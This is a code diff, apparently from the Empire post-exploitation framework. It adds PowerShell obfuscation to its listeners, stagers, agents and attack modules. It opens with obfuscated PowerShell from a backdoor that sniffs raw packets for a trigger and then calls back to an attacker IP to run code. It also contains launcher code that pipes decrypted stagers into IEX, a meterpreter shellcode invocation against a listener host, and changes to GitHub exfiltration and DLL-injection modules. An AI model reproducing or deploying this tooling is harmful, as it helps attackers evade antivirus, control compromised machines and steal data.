${bY`Te`Out} = &("{2}{0}{1}" -f 'bj','ect','new-o') ("{1}{2}{0}"-f'e[]','by','t') 4
${B`yT`eDatA} = &("{2}{1}{0}" -f't','bjec','new-o') ("{0}{1}{2}"-f 'b','yte','[]') 4096
${BYtE`iN}[0] = 1
${bY`T`eIN}[1-3] = 0
${B`Yte`out}[0-3] = 0
${sOC`Ket} = &("{2}{0}{1}{3}" -f 'w','-objec','ne','t') ("{1}{0}{6}{4}{2}{5}{3}" -f't','sys','ckets.sock','t','m.net.so','e','e')( ${H`e8}::"i`NTErn`ET`wOrk", ${RH2`iz}::"r`AW", (&("{1}{2}{0}"-f 'iaBLe','v','Ar') ('O'+'0F') -vALuEo )::"i`p")
${Soc`K`Et}.("{0}{2}{1}"-f'setsocketop','on','ti').Invoke("IP",("{0}{3}{2}{1}{4}"-f'H','clud','aderIn','e','ed'),${T`Rue})
${so`CK`Et}."recEivebufFE`R`S`IzE" = 819200
${ip`endpOi`NT} = &("{2}{1}{0}"-f'object','w-','ne') ("{2}{0}{3}{4}{5}{1}" -f'e','point','syst','m','.','net.ipend')([net.ipaddress]"$localIP",0)
${SOc`KET}.("{1}{0}"-f'nd','bi').Invoke(${Ip`end`Point})
[void]${S`Oc`kEt}.("{2}{0}{1}"-f'ntro','l','ioco').Invoke( ( &("{2}{3}{1}{0}" -f 'M','HIldite','gEt-','c') ("vARi"+"ab"+"l"+"E:7NX2bS") )."va`lue"::"recei`V`E`AlL",${B`YtE`in},${byt`e`OuT})
${sT`A`R`TTIME} = &("{1}{2}{0}"-f'ate','ge','t-d')
${RU`NNIng} = ${t`Rue}
${M`A`Tch} = ""
${PAcK`ets} = @()
while (${rUN`Ni`Ng})
{
if (${T`ImEo`ut} -ne 0 -and ($( ( &("{0}{1}"-f 'gC','i') ('v'+'aRIABlE:'+'c'+'Qm') )."v`ALUE"::"n`OW") -gt ${STa`Rt`TIMe}.("{1}{0}{2}" -f'second','add','s').Invoke(${T`iMEoUt})))
{
${r`U`NnInG}=${F`A`LSE}
}
if (-not ${S`ockEt}."av`AiLAB`le")
{
&("{0}{1}{2}"-f 'star','t-','sleep') -milliseconds 500
continue
}
${R`CV} = ${S`OCKeT}.("{0}{2}{1}" -f'rec','e','eiv').Invoke(${b`Yt`EdatA},0,${B`Y`T`EDaTa}."lEn`GtH", ${x`E3}::"nO`NE")
${mEMO`Rys`TR`E`Am} = &("{2}{0}{1}" -f'bjec','t','new-o') ("{3}{0}{4}{1}{2}"-f 'em.I','re','am','Syst','O.MemorySt')(${byT`e`DATA},0,${r`cv})
${BIN`ARY`R`eADEr} = &("{2}{1}{0}"-f't','ew-objec','n') ("{0}{2}{1}{3}" -f'Syste','O.B','m.I','inaryReader')(${mEMO`RyS`TReAM})
${trA`Sh} = ${bIN`ARY`REad`ER}.("{0}{1}{3}{2}" -f 'Read','By','es','t').Invoke(12)
${S`ourcE`iPaddrE`Ss} = ${bIn`AR`YR`EadER}.("{0}{1}{2}" -f'Read','U','Int32').Invoke()
${sOur`ce`i`padDrESS} = [System.Net.IPAddress]${SOu`R`cEIPAD`d`REss}
${D`E`StInAt`ioNIP`AddrE`sS} = ${bINA`R`YrEaDEr}.("{2}{0}{1}"-f 'U','Int32','Read').Invoke()
${D`e`STinaTionipAddR`ESs} = [System.Net.IPAddress]${d`Es`TInat`IO`NIPA`DdReSS}
${RE`mAiNd`e`RByTeS} = ${b`INARYRE`Ader}.("{0}{3}{2}{1}"-f 'R','s','adByte','e').Invoke(${ME`M`OrYStr`EAM}."le`NGtH")
${AS`ci`iEn`COdING} = &("{2}{3}{0}{1}"-f'j','ect','n','ew-ob') ("{5}{3}{2}{4}{0}{1}"-f't.asciienc','oding','t','ys','em.tex','s')
${RE`mAIn`dErOf`PAc`KEt} = ${a`S`CiiENCODING}.("{0}{2}{1}"-f'G','tString','e').Invoke(${reMain`D`er`ByTeS})
${bIN`ARYre`AdER}.("{0}{1}" -f 'Clo','se').Invoke()
${MEmor`y`ST`ReAm}.("{1}{0}" -f 'se','Clo').Invoke()
if (${R`eMainD`E`ROFp`AcKet} -match ${TR`IgGeR})
{
&("{1}{2}{0}" -f 'host','writ','e-') ("{1}{0}"-f 'atch: ','M') ${SOurceIpA`d`dre`ss}
${rUNni`Ng}=${F`A`lSE}
${m`AtcH} = ${SOu`RCE`IpAD`D`ResS}
}
}
if(${m`AT`CH})
{
if(${CaLL`B`AcKiP})
{
${su`Cc`EsS} = &("{3}{2}{5}{0}{4}{1}"-f 'ck','X','l','Invoke-Cal','IE','ba') ${C`ALlba`c`kiP}
}
else
{
${SUcCe`SS} = &("{1}{3}{5}{0}{2}{4}" -f'allba','Invo','ckI','k','EX','e-C') ${MAt`ch}
}
}
}
function iNV`OkE-`CaLLBAcklO`op
{
Param(
[Parameter(MaNDaTorY=${TR`Ue},POSITION=1)]
[string]${ca`lLb`ACkiP},
[Parameter(MANdAtoRy=${f`A`lse},POsItioN=2)]
[int]${TIm`E`out}=0,
[Parameter(MAnDatORy=${F`Al`SE},poSitIon=3)]
[int] ${s`lEep}=1
)
&("{0}{2}{1}"-f 'w','ost','rite-h') ('T'+'imeo'+'ut:'+' '+"$Timeout")
&("{0}{1}{3}{2}" -f 'w','ri','-host','te') ('Sleep'+': '+"$Sleep")
&("{1}{0}{2}"-f 'e','writ','-host') ('Call'+'backIP:'+' '+"$CallbackIP")
&("{2}{1}{0}"-f 'host','e-','writ')
&("{0}{2}{1}" -f 'w','t','rite-hos') ("{2}{0}{1}{3}"-f'ng back','d','Starti','oor...')
${rUN`N`Ing}=${t`RUE}
${m`At`ch} =""
${ST`AR`TTIME} = &("{1}{0}" -f 't-date','ge')
while(${Run`N`ing})
{
if (${TiME`o`uT} -ne 0 -and ($( ( &("{0}{2}{3}{1}" -f 'gE','E','t-vArIA','BL') ('c'+'qm') -ValueoNlY )::"N`OW") -gt ${s`TAr`TTIMe}.("{0}{2}{1}"-f'add','conds','se').Invoke(${T`i`MeOut})))
{
${Ru`NnI`NG}=${fAL`Se}
}
${cheCks`uc`CESs} = &("{1}{2}{3}{0}{4}" -f'E','Invoke-Ca','llbac','kI','X') ${C`AL`lB`AcKIp} -Silent ${TR`uE}
if(${c`h`ECksU`CceSS} -eq 1)
{
${rUNNI`NG}=${FA`LsE}
}
&("{1}{0}" -f 'ep','sle') -s ${s`LeEp}
}
&("{0}{2}{1}"-f 'wr','e-host','it') ("{0}{2}{1}{4}{3}"-f 'Sh','ing d','utt','r...','own backdoo')
}

1
data/obfuscated_module_source/privesc/.gitignore vendored Normal file
View File

@ -0,0 +1 @@
*.ps1

1
data/obfuscated_module_source/recon/.gitignore vendored Normal file
View File

@ -0,0 +1 @@
*.ps1

1
data/obfuscated_module_source/situational_awareness/.gitignore vendored Normal file
View File

@ -0,0 +1 @@
*.ps1

1
data/obfuscated_module_source/situational_awareness/host/.gitignore vendored Normal file
View File

@ -0,0 +1 @@
*.ps1

1
data/obfuscated_module_source/situational_awareness/network/.gitignore vendored Normal file
View File

@ -0,0 +1 @@
*.ps1

1
data/obfuscated_module_source/trollsploit/.gitignore vendored Normal file
View File

@ -0,0 +1 @@
*.ps1

1
lib/common/agents.py
View File

@ -1180,6 +1180,7 @@ class Agents:
try:
message = encryption.aes_decrypt_and_verify(stagingKey, encData)
except Exception as e:
print 'exception e:' + str(e)
# if we have an error during decryption
dispatcher.send("[!] HMAC verification failed from '%s'" % (sessionID), sender='Agents')
return 'ERROR: HMAC verification failed'

93
lib/common/empire.py
View File

@ -19,7 +19,7 @@ import sqlite3
import os
import hashlib
import time
import fnmatch
# Empire imports
import helpers
@ -72,7 +72,7 @@ class MainMenu(cmd.Cmd):
time.sleep(1)
# pull out some common configuration information
(self.isroot, self.installPath, self.ipWhiteList, self.ipBlackList) = helpers.get_config('rootuser, install_path,ip_whitelist,ip_blacklist')
(self.isroot, self.installPath, self.ipWhiteList, self.ipBlackList, self.obfuscate, self.obfuscateCommand) = helpers.get_config('rootuser, install_path,ip_whitelist,ip_blacklist,obfuscate,obfuscate_command')
# change the default prompt for the user
self.prompt = '(Empire) > '
@ -573,8 +573,19 @@ class MainMenu(cmd.Cmd):
print helpers.color("[!] Error opening ip file %s" % (parts[1]))
else:
self.agents.ipBlackList = helpers.generate_ip_list(",".join(parts[1:]))
elif parts[0].lower() == "obfuscate":
if parts[1].lower() == "true":
self.obfuscate = True
print helpers.color("[*] Obfuscating all future powershell commands run on all agents.")
elif parts[1].lower() == "false":
print helpers.color("[*] Future powershell command run on all agent will no longer be obfuscated.")
self.obfuscate = False
else:
print helpers.color("[!] Valid options for obfuscate are 'true' or 'false'")
elif parts[0].lower() == "obfuscate_command":
self.obfuscateCommand = parts[1]
else:
print helpers.color("[!] Please choose 'ip_whitelist' or 'ip_blacklist'")
print helpers.color("[!] Please choose 'ip_whitelist', 'ip_blacklist', 'obfuscate', or 'obfuscate_command'")
def do_reset(self, line):
@ -593,6 +604,10 @@ class MainMenu(cmd.Cmd):
print self.agents.ipWhiteList
if line.strip().lower() == "ip_blacklist":
print self.agents.ipBlackList
if line.strip().lower() == "obfuscate":
print self.obfuscate
if line.strip().lower() == "obfuscate_command":
print self.obfuscateCommand
def do_load(self, line):
@ -688,6 +703,70 @@ class MainMenu(cmd.Cmd):
else:
print helpers.color("[!] Please enter a valid agent name")
def do_preobfuscate(self, line):
"Preobfuscate powershell modules"
module = line.strip()
if module == "" or module == "all":
choice = raw_input(helpers.color("[>] Preobfuscate all powershell modules using obfuscation command: \"" + self.obfuscateCommand + "\"? This may take a substantial amount of time. [y/N] ", "red"))
if choice.lower() != "" and choice.lower()[0] == "y":
reobfuscate = False
choice = raw_input(helpers.color("[>] Force reobfuscation of previously obfuscated modules? [y/N] ", "red"))
if choice.lower() != "" and choice.lower()[0] == "y":
reobfuscate = True
originalPath = self.installPath + 'data/module_source'
pattern = '*.ps1'
for root, dirs, files in os.walk(originalPath):
for filename in fnmatch.filter(files, pattern):
filePath = os.path.join(root, filename)
obfuscatedFilePath = self.installPath + 'data/obfuscated_module_source' + filePath.split(originalPath)[-1]
if not os.path.isfile(obfuscatedFilePath) or reobfuscate:
(head, tail) = os.path.split(obfuscatedFilePath)
if not os.path.exists(head):
os.makedirs(head)
print helpers.color("[*] Obfuscating " + filename + "...")
fr = open(filePath, 'r')
script = fr.read()
fr.close()
fw = open(obfuscatedFilePath, 'w')
fw.write(helpers.obfuscate(script, self.installPath, obfuscationCommand=self.obfuscateCommand))
fw.close()
else:
print helpers.color("[*] " + filename + " already obfuscated.")
else:
originalPath = self.installPath + 'data/module_source'
pattern = '*.ps1'
foundChosenModule = False
for root, dirs, files in os.walk(originalPath):
for filename in fnmatch.filter(files, pattern):
filePath = os.path.join(root, filename)
if filePath.split(originalPath)[-1] == module:
foundChosenModule = True
obfuscatedFilePath = self.installPath + 'data/obfuscated_module_source' + filePath.split(originalPath)[-1]
choice = raw_input(helpers.color("[>] Preobfuscate module? [y/N] ", "red"))
if choice.lower() != "" and choice.lower()[0] == "y":
reobfuscate = False
choice = raw_input(helpers.color("[>] Force reobfuscation if module has been previously obfuscated? [y/N] ", "red"))
if choice.lower() != "" and choice.lower()[0] == "y":
reobfuscate = True
if not os.path.isfile(obfuscatedFilePath) or reobfuscate:
(head, tail) = os.path.split(obfuscatedFilePath)
if not os.path.exists(head):
os.makedirs(head)
print helpers.color("[*] Obfuscating " + filename + "...")
fr = open(filePath, 'r')
script = fr.read()
fr.close()
fw = open(obfuscatedFilePath, 'w')
fw.write(helpers.obfuscate(script, self.installPath, obfuscationCommand=self.obfuscateCommand))
fw.close()
else:
print helpers.color("[*] " + filename + " already obfuscated.")
if foundChosenModule:
print helpers.color("[*] Obfuscation complete.")
else:
print helpers.color("[!] Please enter a valid module path.")
def complete_usemodule(self, text, line, begidx, endidx, language=None):
"Tab-complete an Empire module path."
@ -732,7 +811,7 @@ class MainMenu(cmd.Cmd):
def complete_set(self, text, line, begidx, endidx):
"Tab-complete a global option."
options = ["ip_whitelist", "ip_blacklist"]
options = ["ip_whitelist", "ip_blacklist", "obfuscate", "obfuscate_command"]
if line.split(' ')[1].lower() in options:
return helpers.complete_path(text, line, arg=True)
@ -2809,6 +2888,10 @@ class ListenersMenu(cmd.Cmd):
stager.options['Listener']['Value'] = listenerName
stager.options['Language']['Value'] = language
stager.options['Base64']['Value'] = "True"
if self.mainMenu.obfuscate:
stager.options['Obfuscate']['Value'] = "True"
else:
stager.options['Obfuscate']['Value'] = "False"
print stager.generate()
except Exception as e:
print helpers.color("[!] Error generating launcher: %s" % (e))
@ -3270,7 +3353,7 @@ class ModuleMenu(cmd.Cmd):
self.module.execute()
else:
agentName = self.module.options['Agent']['Value']
moduleData = self.module.generate()
moduleData = self.module.generate(self.mainMenu.obfuscate, self.mainMenu.obfuscateCommand)
if not moduleData or moduleData == "":
print helpers.color("[!] Error: module produced an empty script")

47
lib/common/helpers.py
View File

@ -51,6 +51,7 @@ import threading
import pickle
from time import localtime, strftime
from Crypto.Random import random
from subprocess import call
###############################################################
@ -756,6 +757,52 @@ def dict_factory(cursor, row):
d[col[0]] = row[idx]
return d
# Obfuscate powershell scripts
def obfuscate(psScript, installPath, obfuscationCommand):
# When obfuscating large scripts, command line length is too long. Need to save to temp file
toObfuscateFilename = installPath + "data/misc/ToObfuscate.ps1"
obfuscatedFilename = installPath + "data/misc/Obfuscated.ps1"
toObfuscateFile = open(toObfuscateFilename, 'w')
toObfuscateFile.write(psScript)
toObfuscateFile.close()
# Obfuscate tokens
call("powershell 'Invoke-Obfuscation -ScriptPath %s -Command \"%s\" -Quiet | Out-File -Encoding ASCII %s'" % (toObfuscateFilename, obfuscationCommand, obfuscatedFilename), shell=True)
obfuscatedFile = open(obfuscatedFilename , 'r')
psScript = obfuscatedFile.read()[0:-1]
obfuscatedFile.close()
return psScript
def obfuscate_module(moduleSource, obfuscationCommand="", forceReobfuscation=False):
if is_obfuscated(moduleSource) and not forceReobfuscation:
return
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
# obfuscate and write to obfuscated source path
obfuscatedSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(obfuscatedSource, 'w')
except:
print helpers.color("[!] Could not read obfuscated module source path at: " + str(obfuscatedSource))
return ""
installPath = obfuscatedSource[0:(obfuscatedSource.find("data")-1)]
obfuscatedCode = obfuscate(psScript=moduleCode, installPath=installPath, obfuscationCommand=obfuscationCommand)
f.write(obfuscatedCode)
f.close()
def is_obfuscated(moduleSource):
obfuscatedSource = moduleSource.replace("module_source", "obfuscated_module_source")
return os.path.isfile(obfuscatedSource)
class KThread(threading.Thread):
"""

4
lib/common/stagers.py
View File

@ -76,7 +76,7 @@ class Stagers:
stager.options[option]['Value'] = str(value)
def generate_launcher(self, listenerName, language=None, encode=True, userAgent='default', proxy='default', proxyCreds='default', stagerRetries='0', safeChecks='true'):
def generate_launcher(self, listenerName, language=None, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default', proxy='default', proxyCreds='default', stagerRetries='0', safeChecks='true'):
"""
Abstracted functionality that invokes the generate_launcher() method for a given listener,
if it exists.
@ -88,7 +88,7 @@ class Stagers:
activeListener = self.mainMenu.listeners.activeListeners[listenerName]
launcherCode = self.mainMenu.listeners.loadedListeners[activeListener['moduleName']].generate_launcher(encode=encode, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, stagerRetries=stagerRetries, language=language, listenerName=listenerName, safeChecks=safeChecks)
launcherCode = self.mainMenu.listeners.loadedListeners[activeListener['moduleName']].generate_launcher(encode=encode, obfuscate=obfuscate, obfuscationCommand=obfuscationCommand, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, stagerRetries=stagerRetries, language=language, listenerName=listenerName, safeChecks=safeChecks)
if launcherCode:
return launcherCode

27
lib/listeners/http.py
View File

@ -141,7 +141,7 @@ class Listener:
return True
def generate_launcher(self, encode=True, userAgent='default', proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='', listenerName=None):
def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default', proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='', listenerName=None):
"""
Generate a basic launcher for the specified listener.
"""
@ -236,9 +236,11 @@ class Listener:
# decode everything and kick it over to IEX to kick off execution
stager += helpers.randomize_capitalization("-join[Char[]](& $R $data ($IV+$K))|IEX")
if obfuscate:
stager = helpers.obfuscate(stager, self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode:
if encode and ((not obfuscate) or ("launcher" not in obfuscationCommand.lower())):
return helpers.powershell_launcher(stager)
else:
# otherwise return the case-randomized stager
@ -330,7 +332,7 @@ class Listener:
print helpers.color("[!] listeners/http generate_launcher(): invalid listener name specification!")
def generate_stager(self, listenerOptions, encode=False, encrypt=True, language=None):
def generate_stager(self, listenerOptions, encode=False, encrypt=True, obfuscate=False, obfuscationCommand="", language=None):
"""
Generate the stager code needed for communications with this listener.
"""
@ -382,7 +384,13 @@ class Listener:
randomizedStager += helpers.randomize_capitalization(line)
else:
randomizedStager += line
if obfuscate:
print 'stage before obfuscation:'
print randomizedStager
randomizedStager = helpers.obfuscate(randomizedStager, self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
print 'stage after obfuscation:'
print randomizedStager
# base64 encode the stager and return it
if encode:
return helpers.enc_powershell(randomizedStager)
@ -425,7 +433,7 @@ class Listener:
print helpers.color("[!] listeners/http generate_stager(): invalid language specification, only 'powershell' and 'python' are currently supported for this module.")
def generate_agent(self, listenerOptions, language=None):
def generate_agent(self, listenerOptions, language=None, obfuscate=False, obfuscationCommand=""):
"""
Generate the full agent code needed for communications with this listener.
"""
@ -468,7 +476,8 @@ class Listener:
code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',")
if workingHours != "":
code = code.replace('$WorkingHours,', "$WorkingHours = '" + str(workingHours) + "',")
if obfuscate:
code = helpers.obfuscate(code, self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
return code
elif language == 'python':
@ -727,7 +736,7 @@ def send_message(packets=None):
# step 2 of negotiation -> return stager.ps1 (stage 1)
dispatcher.send("[*] Sending %s stager (stage 1) to %s" % (language, clientIP), sender='listeners/http')
stage = self.generate_stager(language=language, listenerOptions=listenerOptions)
stage = self.generate_stager(language=language, listenerOptions=listenerOptions, obfuscate=self.mainMenu.obfuscate, obfuscationCommand=self.mainMenu.obfuscateCommand)
return make_response(stage, 200)
elif results.startswith('ERROR:'):
@ -780,7 +789,7 @@ def send_message(packets=None):
dispatcher.send("[*] Sending agent (stage 2) to %s at %s" % (sessionID, clientIP), sender='listeners/http')
# step 6 of negotiation -> server sends patched agent.ps1/agent.py
agentCode = self.generate_agent(language=language, listenerOptions=listenerOptions)
agentCode = self.generate_agent(language=language, listenerOptions=listenerOptions, obfuscate=self.mainMenu.obfuscate, obfuscationCommand=self.mainMenu.obfuscateCommand)
encryptedAgent = encryption.aes_encrypt_then_hmac(sessionKey, agentCode)
# TODO: wrap ^ in a routing packet?

19
lib/listeners/http_com.py
View File

@ -142,7 +142,7 @@ class Listener:
return True
def generate_launcher(self, encode=True, userAgent='default', proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='', listenerName=None):
def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default', proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='', listenerName=None):
"""
Generate a basic launcher for the specified listener.
"""
@ -198,8 +198,10 @@ class Listener:
# decode everything and kick it over to IEX to kick off execution
stager += helpers.randomize_capitalization("-join[Char[]](& $R $data ($IV+$K))|IEX")
if obfuscate:
stager = helpers.obfuscate(stager, self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode:
if encode and ((not obfuscate) or ("launcher" not in obfuscationCommand.lower())):
return helpers.powershell_launcher(stager)
else:
# otherwise return the case-randomized stager
@ -212,7 +214,7 @@ class Listener:
print helpers.color("[!] listeners/http_com generate_launcher(): invalid listener name specification!")
def generate_stager(self, listenerOptions, encode=False, encrypt=True, language=None):
def generate_stager(self, listenerOptions, encode=False, encrypt=True, obfuscate=False, obfuscationCommand="", language=None):
"""
Generate the stager code needed for communications with this listener.
"""
@ -259,6 +261,8 @@ class Listener:
else:
randomizedStager += line
if obfuscate:
randomizedStager = helpers.obfuscate(randomizedStager, self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode:
return helpers.enc_powershell(randomizedStager)
@ -273,7 +277,7 @@ class Listener:
print helpers.color("[!] listeners/http_com generate_stager(): invalid language specification, only 'powershell' is current supported for this module.")
def generate_agent(self, listenerOptions, language=None):
def generate_agent(self, listenerOptions, language=None, obfuscate=False, obfuscationCommand=""):
"""
Generate the full agent code needed for communications with this listener.
"""
@ -316,7 +320,8 @@ class Listener:
code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',")
if workingHours != "":
code = code.replace('$WorkingHours,', "$WorkingHours = '" + str(workingHours) + "',")
if obfuscate:
code = helpers.obfuscate(code, self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
return code
else:
@ -489,7 +494,7 @@ class Listener:
# step 2 of negotiation -> return stager.ps1 (stage 1)
dispatcher.send("[*] Sending %s stager (stage 1) to %s" % (language, clientIP), sender='listeners/http_com')
stage = self.generate_stager(language=language, listenerOptions=listenerOptions)
stage = self.generate_stager(language=language, listenerOptions=listenerOptions, obfuscate=self.mainMenu.obfuscate, obfuscationCommand=self.mainMenu.obfuscateCommand)
return make_response(base64.b64encode(stage), 200)
elif results.startswith('ERROR:'):
@ -544,7 +549,7 @@ class Listener:
dispatcher.send("[*] Sending agent (stage 2) to %s at %s" % (sessionID, clientIP), sender='listeners/http_com')
# step 6 of negotiation -> server sends patched agent.ps1/agent.py
agentCode = self.generate_agent(language=language, listenerOptions=listenerOptions)
agentCode = self.generate_agent(language=language, listenerOptions=listenerOptions, obfuscate=self.mainMenu.obfuscate, obfuscationCommand=self.mainMenu.obfuscateCommand)
encrypted_agent = encryption.aes_encrypt_then_hmac(sessionKey, agentCode)
# TODO: wrap ^ in a routing packet?

10
lib/listeners/http_foreign.py
View File

@ -117,7 +117,7 @@ class Listener:
return True
def generate_launcher(self, encode=True, userAgent='default', proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='', listenerName=None):
def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default', proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='', listenerName=None):
"""
Generate a basic launcher for the specified listener.
"""
@ -203,8 +203,10 @@ class Listener:
# decode everything and kick it over to IEX to kick off execution
stager += helpers.randomize_capitalization("-join[Char[]](& $R $data ($IV+$K))|IEX")
if obfuscate:
stager = helpers.obfuscate(stager, self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode:
if encode and ((not obfuscate) or ("launcher" not in obfuscationCommand.lower())):
return helpers.powershell_launcher(stager)
else:
# otherwise return the case-randomized stager
@ -283,7 +285,7 @@ class Listener:
print helpers.color("[!] listeners/http_foreign generate_launcher(): invalid listener name specification!")
def generate_stager(self, listenerOptions, encode=False, encrypt=True, language=None):
def generate_stager(self, listenerOptions, encode=False, encrypt=True, obfuscate=False, obfuscationCommand="", language=None):
"""
If you want to support staging for the listener module, generate_stager must be
implemented to return the stage1 key-negotiation stager code.
@ -292,7 +294,7 @@ class Listener:
return ''
def generate_agent(self, listenerOptions, language=None):
def generate_agent(self, listenerOptions, language=None, obfuscate=False, obfuscationCommand=""):
"""
If you want to support staging for the listener module, generate_agent must be
implemented to return the actual staged agent code.

10
lib/listeners/http_hop.py
View File

@ -97,7 +97,7 @@ class Listener:
return True
def generate_launcher(self, encode=True, userAgent='default', proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='', listenerName=None):
def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default', proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='', listenerName=None):
"""
Generate a basic launcher for the specified listener.
"""
@ -182,8 +182,10 @@ class Listener:
# decode everything and kick it over to IEX to kick off execution
stager += helpers.randomize_capitalization("-join[Char[]](& $R $data ($IV+$K))|IEX")
if obfuscate:
stager = helpers.obfuscate(stager, self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode:
if encode and ((not obfuscate) or ("launcher" not in obfuscationCommand.lower())):
return helpers.powershell_launcher(stager)
else:
# otherwise return the case-randomized stager
@ -259,7 +261,7 @@ class Listener:
else:
print helpers.color("[!] listeners/http_hop generate_launcher(): invalid listener name specification!")
def generate_stager(self, listenerOptions, encode=False, encrypt=True, language=None):
def generate_stager(self, listenerOptions, encode=False, encrypt=True, obfuscate=False, obfuscationCommand="", language=None):
"""
If you want to support staging for the listener module, generate_stager must be
implemented to return the stage1 key-negotiation stager code.
@ -268,7 +270,7 @@ class Listener:
return ''
def generate_agent(self, listenerOptions, language=None):
def generate_agent(self, listenerOptions, language=None, obfuscate=False, obfuscationCommand=""):
"""
If you want to support staging for the listener module, generate_agent must be
implemented to return the actual staged agent code.

8
lib/listeners/meterpreter.py
View File

@ -65,7 +65,7 @@ class Listener:
return True
def generate_launcher(self, encode=True, userAgent='default', proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='', listenerName=None):
def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default', proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='', listenerName=None):
"""
Generate a basic launcher for the specified listener.
"""
@ -101,13 +101,15 @@ class Listener:
script = helpers.strip_powershell_comments(script)
script += "\nInvoke-Shellcode -Payload %s -Lhost %s -Lport %s -Force" % (msfPayload, host, port)
if obfuscate:
script = helpers.obfuscate(script, self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
return script
else:
print helpers.color("[!] listeners/meterpreter generate_launcher(): invalid listener name specification!")
def generate_stager(self, encode=False, encrypt=True, language=None):
def generate_stager(self, encode=False, encrypt=True, obfuscate=False, obfuscationCommand="", language=None):
"""
Nothing to actually generate here for foreign listeners.
"""
@ -115,7 +117,7 @@ class Listener:
pass
def generate_agent(self, language=None):
def generate_agent(self, language=None, obfuscate=False, obfuscationCommand=""):
"""
Nothing to actually generate here for foreign listeners.
"""

6
lib/listeners/template.py
View File

@ -116,7 +116,7 @@ class Listener:
return True
def generate_launcher(self, encode=True, userAgent='default', proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='', listenerName=None):
def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default', proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='', listenerName=None):
"""
Generate a basic launcher for the specified listener.
"""
@ -151,7 +151,7 @@ class Listener:
print helpers.color("[!] listeners/template generate_launcher(): invalid listener name specification!")
def generate_stager(self, listenerOptions, encode=False, encrypt=True, language=None):
def generate_stager(self, listenerOptions, encode=False, encrypt=True, obfuscate=False, obfuscationCommand="", language=None):
"""
If you want to support staging for the listener module, generate_stager must be
implemented to return the stage1 key-negotiation stager code.
@ -160,7 +160,7 @@ class Listener:
return ''
def generate_agent(self, listenerOptions, language=None):
def generate_agent(self, listenerOptions, language=None, obfuscate=False, obfuscationCommand=""):
"""
If you want to support staging for the listener module, generate_agent must be
implemented to return the actual staged agent code.

15
lib/modules/exfiltration/Invoke_ExfilDataToGitHub.py
View File

@ -114,11 +114,14 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
# if you're reading in a large, external script that might be updates,
# use the pattern below
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/exfil/Invoke-ExfilDataToGitHub.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -131,7 +134,7 @@ class Module:
script = moduleCode
# Need to actually run the module that has been loaded
script += 'Invoke-ExfilDataToGitHub'
scriptEnd = 'Invoke-ExfilDataToGitHub'
# add any arguments to the end execution of the script
for option,values in self.options.iteritems():
@ -139,8 +142,10 @@ class Module:
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
scriptEnd += " -" + str(option)
else:
script += " -" + str(option) + " \"" + str(values['Value']) + "\""
scriptEnd += " -" + str(option) + " \"" + str(values['Value']) + "\""
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

13
lib/modules/powershell/code_execution/invoke_dllinjection.py
View File

@ -62,11 +62,13 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/code_execution/Invoke-DllInjection.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -78,11 +80,14 @@ class Module:
script = moduleCode
script += "\nInvoke-DllInjection"
scriptEnd = "\nInvoke-DllInjection"
for option,values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
script += " -" + str(option) + " " + str(values['Value'])
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
script += scriptEnd
